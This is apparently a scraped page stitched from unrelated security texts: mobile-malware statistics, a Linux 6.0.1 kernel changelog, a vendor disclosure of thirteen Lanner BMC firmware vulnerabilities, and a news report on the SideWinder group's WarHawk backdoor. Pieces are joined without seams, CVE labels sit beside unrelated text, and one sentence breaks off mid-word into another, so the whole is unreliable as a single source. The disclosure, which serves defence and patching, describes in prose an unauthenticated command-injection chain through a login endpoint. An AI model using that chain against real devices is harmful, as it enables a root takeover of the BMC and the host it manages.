Meanwhile, Kaspersky said it blocked some 5.5 million malware, adware, and riskware attacks targeted at mobile devices in Q2 2022. More than 25% of these attacks involved adware, making it the most common mobile threat at the moment. But other notable threats included mobile banking Trojans, mobile ransomware tools, spyware link SandStrike, and malware downloaders. Kaspersky found that creators of some malicious mobile apps have increasingly targeted users from multiple countries at once.

The mobile malware trend poses a growing threat to enterprise organizations, especially those that allow unmanaged and personally owned devices in the workplace. Last year, the US Cybersecurity and Infrastructure Security Agency (CISA) released a checklist of actions that organizations can take to address these threats. Its recommendations include the need for organizations to implement security-focused mobile device management; to ensure that only trusted devices are allowed access to applications and data; to use strong authentication; to disable access to third-party app stores; and to ensure that users use only curated app stores.

Cyber-Threat Actor Uses Booby-Trapped VPN App to Deploy Android Spyware

drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor's internal memory.

commit fbd56ddcecab5a3623a89c8e941fdbcc55b41045 Author: Greg Kroah-Hartman Date: Wed Oct 12 09:39:05 2022 +0200 Linux 6.0.1 Link: https://lore.kernel.org/r/20221010070330.159911806@linuxfoundation.org Tested-by: Luna Jernberg Tested-by: Fenil Jain Tested-by: Linux Kernel Functional Testing Tested-by: Justin M. Forbes Tested-by: Florian Fainelli Tested-by: Ronald Warsow Tested-by: Shuah Khan Tested-by: Zan Aziz Tested-by: Slade Watkins Tested-by: Guenter Roeck Tested-by: Rudi Heitbaum Tested-by: Bagas Sanjaya Tested-by: Jon Hunter Tested-by: Sudip Mukherjee Tested-by: Ron Economos Signed-off-by: Greg Kroah-Hartman commit 3c6b036fe5c8ed8b6c4cbdc03605929882907ef0 Author: Tetsuo Handa Date: Fri Sep 2 20:23:48 2022 +0900 Bluetooth: use hdev->workqueue when queuing hdev->{cmd,ncmd}\_timer works commit deee93d13d385103205879a8a0915036ecd83261 upstream. syzbot is reporting attempt to schedule hdev->cmd\_work work from system\_wq WQ into hdev->workqueue WQ which is under draining operation \[1\], for commit c8efcc2589464ac7 ("workqueue: allow chained queueing during destruction") does not allow such operation. The check introduced by commit 877afadad2dce8aa ("Bluetooth: When HCI work queue is drained, only queue chained work") was incomplete. Use hdev->workqueue WQ when queuing hdev->{cmd,ncmd}\_timer works because hci\_{cmd,ncmd}\_timeout() calls queue\_work(hdev->workqueue). Also, protect the queuing operation with RCU read lock in order to avoid calling queue\_delayed\_work() after cancel\_delayed\_work() completed. Link: https://syzkaller.appspot.com/bug?extid=243b7d89777f90f7613b \[1\] Reported-by: syzbot Signed-off-by: Tetsuo Handa Fixes: 877afadad2dce8aa ("Bluetooth: When HCI work queue is drained, only queue chained work") Signed-off-by: Luiz Augusto von Dentz Signed-off-by: Greg Kroah-Hartman commit 390ba6a7755d6db79e8000d5501096c24f3b8bfd Author: Jules Irenge Date: Wed Sep 7 16:24:20 2022 +0100 bpf: Fix resetting logic for unreferenced kptrs commit 9fad7fe5b29803584c7f17a2abe6c2936fec6828 upstream. Sparse reported a warning at bpf\_map\_free\_kptrs() "warning: Using plain integer as NULL pointer" During the process of fixing this warning, it was discovered that the current code erroneously writes to the pointer variable instead of deferencing and writing to the actual kptr. Hence, Sparse tool accidentally helped to uncover this problem. Fix this by doing WRITE\_ONCE(\*p, 0) instead of WRITE\_ONCE(p, 0). Note that the effect of this bug is that unreferenced kptrs will not be cleared during check\_and\_free\_fields. It is not a problem if the clearing is not done during map\_free stage, as there is nothing to free for them. Fixes: 14a324f6a67e ("bpf: Wire up freeing of referenced kptr") Signed-off-by: Jules Irenge Link: https://lore.kernel.org/r/Yxi3pJaK6UDjVJSy@playground Signed-off-by: Alexei Starovoitov Signed-off-by: Greg Kroah-Hartman commit 448faed285b9a0dc4101ffb6a256aa261fcd0979 Author: Daniel Golle Date: Fri Sep 30 01:56:53 2022 +0100 net: ethernet: mtk\_eth\_soc: fix state in \_\_mtk\_foe\_entry\_clear commit ae3ed15da5889263de372ff9df2e83e16acca4cb upstream. Setting ib1 state to MTK\_FOE\_STATE\_UNBIND in \_\_mtk\_foe\_entry\_clear routine as done by commit 0e80707d94e4c8 ("net: ethernet: mtk\_eth\_soc: fix typo in \_\_mtk\_foe\_entry\_clear") breaks flow offloading, at least on older MTK\_NETSYS\_V1 SoCs, OpenWrt users have confirmed the bug on MT7622 and MT7621 systems. Felix Fietkau suggested to use MTK\_FOE\_STATE\_INVALID instead which works well on both, MTK\_NETSYS\_V1 and MTK\_NETSYS\_V2. Tested on MT7622 (Linksys E8450) and MT7986 (BananaPi BPI-R3). Suggested-by: Felix Fietkau Fixes: 0e80707d94e4c8 ("net: ethernet: mtk\_eth\_soc: fix typo in \_\_mtk\_foe\_entry\_clear") Fixes: 33fc42de33278b ("net: ethernet: mtk\_eth\_soc: support creating mac address based offload entries") Signed-off-by: Daniel Golle Link: https://lore.kernel.org/r/YzY+1Yg0FBXcnrtc@makrotopia.org Signed-off-by: Jakub Kicinski Signed-off-by: Greg Kroah-Hartman commit 50fe01fa7640bc216bb1a47754a1f799c20eff8e Author: Kumar Kartikeya Dwivedi Date: Wed Sep 21 16:35:50 2022 +0200 bpf: Gate dynptr API behind CAP\_BPF commit 8addbfc7b308d591f8a5f2f6bb24d08d9d79dfbb upstream. This has been enabled for unprivileged programs for only one kernel release, hence the expected annoyances due to this move are low. Users using ringbuf can stick to non-dynptr APIs. The actual use cases dynptr is meant to serve may not make sense in unprivileged BPF programs. Hence, gate these helpers behind CAP\_BPF and limit use to privileged BPF programs. Fixes: 263ae152e962 ("bpf: Add bpf\_dynptr\_from\_mem for local dynptrs") Fixes: bc34dee65a65 ("bpf: Dynptr support for ring buffers") Fixes: 13bbbfbea759 ("bpf: Add bpf\_dynptr\_read and bpf\_dynptr\_write") Fixes: 34d4ef5775f7 ("bpf: Add dynptr data slices") Signed-off-by: Kumar Kartikeya Dwivedi Link: https://lore.kernel.org/r/20220921143550.30247-1-memxor@gmail.com Acked-by: Andrii Nakryiko Signed-off-by: Alexei Starovoitov Signed-off-by: Greg Kroah-Hartman commit 64517c21fd0f28b40a75d0d3121276b31399278e Author: Palmer Dabbelt Date: Tue Sep 20 13:45:18 2022 -0700 RISC-V: Print SSTC in canonical order commit 61a41d16ad20657f93613229a8b17766c51dc849 upstream. This got out of order during a merge conflict, fix it by putting the entries in the correct order. Fixes: 7ab52f75a9cf ("RISC-V: Add Sstc extension support") Signed-off-by: Palmer Dabbelt Reviewed-by: Conor Dooley Reviewed-by: Heiko Stuebner Cc: stable@vger.kernel.org Link: https://lore.kernel.org/r/20220920204518.10988-1-palmer@rivosinc.com/ Signed-off-by: Palmer Dabbelt Signed-off-by: Greg Kroah-Hartman commit d3b5e30e87b52404765b25d9ee156a85c3d8caf6 Author: Mario Limonciello Date: Tue Aug 2 23:25:00 2022 -0500 gpiolib: acpi: Add a quirk for Asus UM325UAZ commit 0ea76c401f9245ac209f1b1ce03a7e1fb9de36e5 upstream. Asus UM325UAZ has GPIO 18 programmed as both an interrupt and a wake source, but confirmed with internal team on this design this pin is floating and shouldn't have been programmed. This causes lots of spurious IRQs on the system and horrendous battery life. Add a quirk to ignore attempts to program this pin on this system. Reported-by: Pavel Krc Link: https://bugzilla.kernel.org/show\_bug.cgi?id=216208 Reviewed-by: Hans de Goede Signed-off-by: Mario Limonciello Reviewed-by: Mika Westerberg Signed-off-by: Andy Shevchenko Signed-off-by: Greg Kroah-Hartman commit 359e1b7a7f79738e00a59f367dbe0d3a819d1754 Author: Mario Limonciello Date: Tue Aug 2 23:24:59 2022 -0500 gpiolib: acpi: Add support to ignore programming an interrupt commit 6b6af7bd5718f4e45a9b930533aec1158387d552 upstream. gpiolib-acpi already had support for ignoring a pin for wakeup, but if an OEM configures a floating pin as an interrupt source then stopping it from being a wakeup won't do much good to stop the interrupt storm. Add support for a module parameter and quirk infrastructure to ignore interrupts as well. Signed-off-by: Mario Limonciello Reviewed-by: Hans de Goede Reviewed-by: Mika Westerberg Signed-off-by: Andy Shevchenko Signed-off-by: Greg Kroah-Hartman commit 94e14d5193c5692faa589b733e9a360154d4696b Author: Johan Hovold Date: Tue Sep 13 16:53:12 2022 +0200 USB: serial: ftdi\_sio: fix 300 bps rate for SIO commit 7bd7ad3c310cd6766f170927381eea0aa6f46c69 upstream. The 300 bps rate of SIO devices has been mapped to 9600 bps since 2003... Let's fix the regression. Cc: stable@vger.kernel.org Signed-off-by: Johan Hovold Signed-off-by: Greg Kroah-Hartman commit 08e2c70e549b77f5f3af9c76da00779d5756f997 Author: Tadeusz Struk Date: Mon Sep 19 14:59:57 2022 -0700 usb: mon: make mmapped memory read only commit a659daf63d16aa883be42f3f34ff84235c302198 upstream. Syzbot found an issue in usbmon module, where the user space client can corrupt the monitor's internal memory, causing the usbmon module to crash the kernel with segfault, UAF, etc. The reproducer mmaps the /dev/usbmon memory to user space, and overwrites it with arbitrary data, which causes all kinds of issues. Return an -EPERM error from mon\_bin\_mmap() if the flag VM\_WRTIE is set. Also clear VM\_MAYWRITE to make it impossible to change it to writable later. Cc: "Dmitry Vyukov" Cc: stable Fixes: 6f23ee1fefdc ("USB: add binary API to usbmon") Suggested-by: PaX Team # for the VM\_MAYRITE portion Link: https://syzkaller.appspot.com/bug?id=2eb1f35d6525fa4a74d75b4244971e5b1411c95a Reported-by: syzbot+23f57c5ae902429285d7@syzkaller.appspotmail.com Signed-off-by: Tadeusz Struk Link: https://lore.kernel.org/r/20220919215957.205681-1-tadeusz.struk@linaro.org Signed-off-by: Greg Kroah-Hartman commit 3a93bbb581f85367b3227a685aa24a051230229c Author: Aleksa Savic Date: Wed Sep 14 13:43:27 2022 +0200 hwmon: (aquacomputer\_d5next) Fix Quadro fan speed offsets commit b7f3e9650f12d1e06b94a0257bcb90279f691bf5 upstream. The offsets for setting speeds of fans connected to Quadro are off by one. Set them to their correct values. The offsets as shown point to registers for setting the fan control mode, which will be explored in future patches, but slipped in here. When setting fan speeds, the resulting values were overlapping, which made the fans still run in my initial testing. Fixes: cdbe34da01e3 ("hwmon: (aquacomputer\_d5next) Add support for Aquacomputer Quadro fan controller") Signed-off-by: Aleksa Savic Link: https://lore.kernel.org/r/20220914114327.6941-1-savicaleksa83@gmail.com Cc: stable@vger.kenrel.org Signed-off-by: Guenter Roeck Signed-off-by: Greg Kroah-Hartman commit 4ec318d06084a807df8eb212e321120236915fd6 Author: Shuah Khan Date: Thu Sep 1 15:23:19 2022 -0600 docs: update mediator information in CoC docs commit 8bfdfa0d6b929ede7b6189e0e546ceb6a124d05d upstream. Update mediator information in the CoC interpretation document. Signed-off-by: Shuah Khan Link: https://lore.kernel.org/r/20220901212319.56644-1-skhan@linuxfoundation.org Cc: stable@vger.kernel.org Signed-off-by: Jonathan Corbet Signed-off-by: Greg Kroah-Hartman commit 49a49d65e21085c088d2a96e583282d59769926b Author: Kees Cook Date: Thu Sep 29 22:57:43 2022 -0700 hardening: Remove Clang's enable flag for -ftrivial-auto-var-init=zero commit 607e57c6c62c00965ae276902c166834ce73014a upstream. Now that Clang's -enable-trivial-auto-var-init-zero-knowing-it-will-be-removed-from-clang option is no longer required, remove it from the command line. Clang 16 and later will warn when it is used, which will cause Kconfig to think it can't use -ftrivial-auto-var-init=zero at all. Check for whether it is required and only use it when so. Cc: Nathan Chancellor Cc: Masahiro Yamada Cc: Nick Desaulniers Cc: linux-kbuild@vger.kernel.org Cc: llvm@lists.linux.dev Cc: stable@vger.kernel.org Fixes: f02003c860d9 ("hardening: Avoid harmless Clang option under CONFIG\_INIT\_STACK\_ALL\_ZERO") Signed-off-by: Kees Cook Signed-off-by: Greg Kroah-Hartman commit a3c72efe3d6143b0964642435d8d8bf42e4fbf75 Author: Sami Tolvanen Date: Fri Sep 30 20:33:10 2022 +0000 Makefile.extrawarn: Move -Wcast-function-type-strict to W=1 commit 2120635108b35ecad9c59c8b44f6cbdf4f98214e upstream. We enable -Wcast-function-type globally in the kernel to warn about mismatching types in function pointer casts. Compilers currently warn only about ABI incompability with this flag, but Clang 16 will enable a stricter version of the check by default that checks for an exact type match. This will be very noisy in the kernel, so disable -Wcast-function-type-strict without W=1 until the new warnings have been addressed. Cc: stable@vger.kernel.org Link: https://reviews.llvm.org/D134831 Link: https://github.com/ClangBuiltLinux/linux/issues/1724 Suggested-by: Nathan Chancellor Signed-off-by: Sami Tolvanen Signed-off-by: Kees Cook Link: https://lore.kernel.org/r/20220930203310.4010564-1-samitolvanen@google.com Signed-off-by: Greg Kroah-Hartman commit df3d15181e00f1e63d778c29d252a25e04f6b046 Author: Bart Van Assche Date: Tue Aug 30 13:58:42 2022 -0700 sparc: Unbreak the build commit 17006e86a7641fa3c50324cfb602f0e74dac8527 upstream. Fix the following build errors: arch/sparc/mm/srmmu.c: In function ‘smp\_flush\_page\_for\_dma’: arch/sparc/mm/srmmu.c:1639:13: error: cast between incompatible function types from ‘void (\*)(long unsigned int)’ to ‘void (\*)(long unsigned int, long unsigned int, long unsigned int, long unsigned int, long unsigned int)’ \[-Werror=cast-function-type\] 1639 | xc1((smpfunc\_t) local\_ops->page\_for\_dma, page); | ^ arch/sparc/mm/srmmu.c: In function ‘smp\_flush\_cache\_mm’: arch/sparc/mm/srmmu.c:1662:29: error: cast between incompatible function types from ‘void (\*)(struct mm\_struct \*)’ to ‘void (\*)(long unsigned int, long unsigned int, long unsigned int, long unsigned int, long unsigned int)’ \[-Werror=cast-function-type\] 1662 | xc1((smpfunc\_t) local\_ops->cache\_mm, (unsigned long) mm); | \[ ... \] Compile-tested only. Fixes: 552a23a0e5d0 ("Makefile: Enable -Wcast-function-type") Cc: stable@vger.kernel.org Signed-off-by: Bart Van Assche Tested-by: Andreas Larsson Signed-off-by: Kees Cook Link: https://lore.kernel.org/r/20220830205854.1918026-1-bvanassche@acm.org Signed-off-by: Greg Kroah-Hartman commit 79bc9ee841abf982affb75c8417abe9091e64304 Author: Al Viro Date: Mon Oct 3 20:26:08 2022 -0400 fix coredump breakage commit 4f526fef91b24197d489ff86789744c67f475bb4 upstream. Let me count the ways in which I'd screwed up: \* when emitting a page, handling of gaps in coredump should happen before fetching the current file position. \* fix for a problem that occurs on rather uncommon setups (and hadn't been observed in the wild) had been sent very late in the cycle. \* ... with badly insufficient testing, introducing an easily reproducible breakage. Without giving it time to soak in -next. Fucked-up-by: Al Viro Reported-by: "J. R. Okajima" Tested-by: "J. R. Okajima" Fixes: 06bbaa6dc53c "\[coredump\] don't use \_\_kernel\_write() on kmap\_local\_page()" Cc: stable@kernel.org # v6.0-only Signed-off-by: Al Viro Signed-off-by: Greg Kroah-Hartman commit 2a96b532098284ecf8e4849b8b9e5fc7a28bdee9 Author: Dongliang Mu Date: Tue Aug 16 12:08:58 2022 +0800 fs: fix UAF/GPF bug in nilfs\_mdt\_destroy commit 2e488f13755ffbb60f307e991b27024716a33b29 upstream. In alloc\_inode, inode\_init\_always() could return -ENOMEM if security\_inode\_alloc() fails, which causes inode->i\_private uninitialized. Then nilfs\_is\_metadata\_file\_inode() returns true and nilfs\_free\_inode() wrongly calls nilfs\_mdt\_destroy(), which frees the uninitialized inode->i\_private and leads to crashes(e.g., UAF/GPF). Fix this by moving security\_inode\_alloc just prior to this\_cpu\_inc(nr\_inodes) Link: https://lkml.kernel.org/r/CAFcO6XOcf1Jj2SeGt=jJV59wmhESeSKpfR0omdFRq+J9nD1vfQ@mail.gmail.com Reported-by: butt3rflyh4ck Reported-by: Hao Sun Reported-by: Jiacheng Xu Reviewed-by: Christian Brauner (Microsoft) Signed-off-by: Dongliang Mu Cc: Al Viro Cc: stable@vger.kernel.org Signed-off-by: Al Viro Signed-off-by: Greg Kroah-Hartman commit a53f14b0a934de4c0ee6935c7ee224e979460a7b Author: Jalal Mostafa Date: Wed Sep 21 13:57:01 2022 +0000 xsk: Inherit need\_wakeup flag for shared sockets commit 60240bc26114543fcbfcd8a28466e67e77b20388 upstream. The flag for need\_wakeup is not set for xsks with \`XDP\_SHARED\_UMEM\` flag and of different queue ids and/or devices. They should inherit the flag from the first socket buffer pool since no flags can be specified once \`XDP\_SHARED\_UMEM\` is specified. Fixes: b5aea28dca134 ("xsk: Add shared umem support between queue ids") Signed-off-by: Jalal Mostafa Signed-off-by: Daniel Borkmann Acked-by: Magnus Karlsson Link: https://lore.kernel.org/bpf/20220921135701.10199-1-jalal.a.mostapha@gmail.com Signed-off-by: Greg Kroah-Hartman

CVE-2022-43750

Observable discrepancies in the login process allow an attacker to guess legitimate user names registered in the BMC. This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.

Over the past year, Nozomi Networks Labs has conducted research on the security of Baseboard Management Controllers (BMCs), with a special focus on OT and IoT devices. In part one of this blog series, we reveal thirteen vulnerabilities that affect BMCs of Lanner devices based on the American Megatrends (AMI) MegaRAC SP-X (AMI’s MegaRAC SP-X standard codebase is not affected by those specific issues). By abusing these vulnerabilities, an unauthenticated attacker may achieve Remote Code Execution (RCE) with root privileges on the BMC, completely compromising it and gaining control of the managed host. During our research, we uncovered other vulnerabilities whose patching is still in progress and thus cannot be disclosed as of yet; those will be covered in a follow-up blog post. 

Our discussion starts with an introduction to BMCs and an illustration of the vulnerabilities discovered. We will then provide an example of how an attacker can abuse these issues to ultimately compromise the device, and conclude with remediations that asset owners can implement. 

Nozomi Networks Labs reveals vulnerabilities in BMC firmware affecting OT/IoT devices. 

**Baseboard Management Controllers (BMC) 101**

A Baseboard Management Controller (BMC) is a supplementary System-on-Chip designed for remote monitoring and management of a computer. Due to this dedicated network interface and tight coupling with critical hardware components (e.g. motherboard chipset), BMCs can perform fully remote low-level system operations, such as keyboard-and-mouse interaction straight from the bootstrap, system power control, BIOS firmware reflash, etc. 

In the past, BMCs were only found in IT server motherboards, whereas vendors are now broadening the scope of BMCs to operational technology (OT) and internet of things (IoT) sectors. One such vendor is Lanner Inc., a Taiwanese brand specializing in embedded applications. Notably, during our research, we analyzed Lanner IAC-AST2500A, an expansion card that enables BMC functionalities on Lanner appliances. IAC-AST2500A’s firmware is based on the American Megatrends (AMI) MegaRAC SP-X solution, a popular BMC firmware also utilized by brands such as Asus, Dell, Gigabyte, HP, Lenovo, or nVidia. 

Among the available network services, the expansion card features a web application through which users can fully control the managed host as well as the BMC itself. Figure 1 depicts a screenshot of the interface. 

**Figure 1.** Screenshot of the web interface of the Lanner IAC-AST2500A 

**Vulnerabilities Found **

By analyzing the web interface of the IAC-AST2500A, we found thirteen vulnerabilities, as listed below: 

*   **CVE-2021-26727**: spx\_restservice SubNet\_handler\_func Multiple Command Injections and Stack-Based Buffer Overflows, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26728**: spx\_restservice KillDupUsr\_func Command Injection and Stack-Based Buffer Overflow, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26729**: spx\_restservice Login\_handler\_func Command Injection and Multiple Stack-Based Buffer Overflows, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26730**: spx\_restservice Login\_handler\_func Subfunction Stack-Based Buffer Overflow, **CVSS v3.1 10** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26731**: spx\_restservice modifyUserb\_func Command Injection and Multiple Stack-Based Buffer Overflows, **CVSS v3.1 9.1** (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) 
*   **CVE-2021-26732**: spx\_restservice First\_network\_func Broken Access Control, CVSS v3.1 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) 
*   **CVE-2021-26733**: spx\_restservice FirstReset\_handler\_func Broken Access Control, CVSS v3.1 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) 
*   **CVE-2021-44776**: spx\_restservice SubNet\_handler\_func Broken Access Control, CVSS v3.1 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) 
*   **CVE-2021-44467**: spx\_restservice KillDupUsr\_func Broken Access Control, CVSS v3.1 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) 
*   **CVE-2021-44769**: TLS Certificate Generation Function Improper Input Validation, CVSS v3.1 4.9 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H) 
*   **CVE-2021-46279**: Session Fixation and Insufficient Session Expiration, CVSS v3.1 5.8 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L) 
*   **CVE-2021-45925**: Username Enumeration, CVSS v3.1 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) 
*   **CVE-2021-4228**: Hard-coded TLS Certificate, CVSS v3.1 5.8 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L) 

These vulnerabilities affect version 1.10.0 of the standard firmware of Lanner IAC-AST2500, except for CVE-2021-4228 which was found on version 1.00.0. 

**Attack Chain Example: CVE-2021-44467 and CVE-2021-26728 **

CVE-2021-44467 and CVE-2021-26728 describe a possible attack chain whereby an unauthenticated attacker can achieve Remote Code Execution (RCE) with root privileges on the BMC. During the login process, the web application asks through a confirmation dialog if the user wants to terminate any other active session on the logged-in account (Figure 2). 

**Figure 2.** Termination of other active sessions on a logged-in account 

This functionality is implemented via an authenticated POST request to “/api/KillDupUsr”, which is ultimately handled by the “KillDupUsr\_func” function of “spx\_restservice”. This function begins as in Figure 3. 

Figure 3 CVE 2021 44467

Although the POST request contains a QSESSIONID cookie, the function does not perform any verification checks on the user session. This flaw enables unauthenticated attackers to arbitrarily terminate active sessions of other users, causing a Denial-of-Service (DoS) condition (CVE-2021-44467). Further issues can be observed by proceeding with the analysis (Figure 4). 

**Figure 4.** CVE-2021-26728 in KillDupUsr\_func 

At line 41, “strcat” is called to copy the content of “v9”, which contains the value of the externally controllable HTTP parameter “username”, into “dest”, a fixed-size buffer. No checks are done on the length of “v9” before executing the instruction, leading to a stack-based buffer overflow. 

At line 46, a “safe\_system” is called with “dest” as argument. Despite the name, it turned out to be possible to inject arbitrary OS commands in the string (for instance, a subshell command) that were executed by the device, leading to a command injection (CVE-2021-26728). When also considering that all processes run with root privileges on the device, the combined weaknesses enable an unauthenticated attacker to completely compromise both the BMC and the managed host. 

**Remediations  **

After sharing all vulnerabilities with Lanner via a responsible disclosure process, the vendor developed updated BMC firmware versions for the IAC-AST2500A that resolve all issues described in this blog. The correct patched version strictly depends on the appliance in use; thus, we urge Lanner customers to contact technical support to receive the appropriate package. 

If asset owners are unable to patch their appliances, we advise enforcing firewall or network access control rules to restrict the network reachability of the web interface to trusted personnel only, or to actively monitor the network traffic via intrusion detection systems. 

**Summary  **

BMCs represent an attractive way to conveniently monitor and manage computer systems without requiring physical access, in the IT as well as in the OT/IoT domain. Nevertheless, their usability comes at the expense of a broader attack surface, and that may lead to an increase of the overall risk if they are not adequately protected. In this blog, we have presented the first results of our analysis of BMCs in OT and IoT devices and discussed thirteen vulnerabilities, five of which are rated as critical. 

During our assessment, we uncovered further vulnerabilities, that are still in the process of being fixed and will be disclosed at a later date. We recommend that our readers regularly monitor our Nozomi Networks Labs page for the release of the follow-up blogpost, which will describe the remaining issues.

**Related Links:**

*   Vulnerability Details: CVE-2021-26727 
*   Vulnerability Details: CVE-2021-26728 
*   Vulnerability Details: CVE-2021-26729 
*   Vulnerability Details: CVE-2021-26730 
*   Vulnerability Details: CVE-2021-26731 
*   Vulnerability Details: CVE-2021-26732 
*   Vulnerability Details: CVE-2021-26733 
*   Vulnerability Details: CVE-2021-44776 
*   Vulnerability Details: CVE-2021-44467 
*   Vulnerability Details: CVE-2021-44769 
*   Vulnerability Details: CVE-2021-46279 
*   Vulnerability Details: CVE-2021-45925 
*   Vulnerability Details: CVE-2021-4228

CVE-2021-45925: Vulnerabilities in BMC Firmware Affect OT/IoT Device Security – Part 1

SideWinder, a prolific nation-state actor mainly known for targeting Pakistan military entities, compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk.
"The newly discovered WarHawk backdoor contains various malicious modules that deliver Cobalt Strike, incorporating new TTPs such as KernelCallBackTable injection

SideWinder, a prolific nation-state actor mainly known for targeting Pakistan military entities, compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called **WarHawk**.

"The newly discovered WarHawk backdoor contains various malicious modules that deliver Cobalt Strike, incorporating new TTPs such as KernelCallBackTable injection and Pakistan Standard Time zone check in order to ensure a victorious campaign," Zscaler ThreatLabz said.

The threat group, also called APT-C-17, Rattlesnake, and Razor Tiger, is suspected to be an Indian state-sponsored group, although a report from Kaspersky earlier this May acknowledged previous indicators that led to the attribution have since disappeared, making it challenging it to link the threat cluster to a specific nation.

More than 1,000 attacks are said to have been launched by the group since April 2020, an indication of SideWinder's newfound aggression since it commenced operations a decade ago in 2012.

The intrusions have been significant not only with regard to their frequency but also in their persistence, even as the group takes advantage of a massive arsenal of obfuscated and newly-developed components.

In June 2022, the threat actor was found leveraging an AntiBot script that's designed to filter their victims to check the client browser environment, specifically the IP address, to ensure the targets are located in Pakistan.

The September campaign spotted by Zscaler entails the use of a weaponized ISO file hosted on NEPRA's website to activate a killchain that leads to the deployment of the WarHawk malware, with the artifact also acting as a decoy to hide the malicious activity by displaying a legitimate advisory issued by the Cabinet Division of Pakistan on July 27, 2022.

WarHawk, for its part, masquerades as legitimate apps such as ASUS Update Setup and Realtek HD Audio Manager to lure unsuspecting victims into execution, resulting the exfiltration of system metadata to a hard-coded remote server, while also receiving additional payloads from the URL.

This includes a command execution module that's responsible for the execution of system commands on the infected machine received from the command-and-control server, a file manager module that recursively enumerates files present in different drives, and an upload module that transmits files of interest to the server.

Also deployed as a second-stage payload using the aforementioned command execution module is a Cobalt Strike Loader, which validates the host's time zone to confirm it matches the Pakistan Standard Time (PKT), failing which the process is terminated.

Following the anti-anThe loader injects shellcode into a notepad.exe process using a technique called KernelCallbackTable process injection, with the malware author lifting source code from a technical write-up published in April 2022 by a researcher who goes by the online alias Capt. Meelo.

The shellcode then decrypts and loads Beacon, the default malware payload used by Cobalt Strike to establish a connection to its command-and-control server.

Per the cybersecurity company, the attack campaign's connections to the SideWinder APT stem from the reuse of network infrastructure that has been identified as used by the group in prior espionage-focused activities against Pakistan.

"The SideWinder APT Group is continuously evolving their tactics and adding new malware to their arsenal in order to carry out successful espionage attack campaigns against their targets," the researchers concluded.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#asus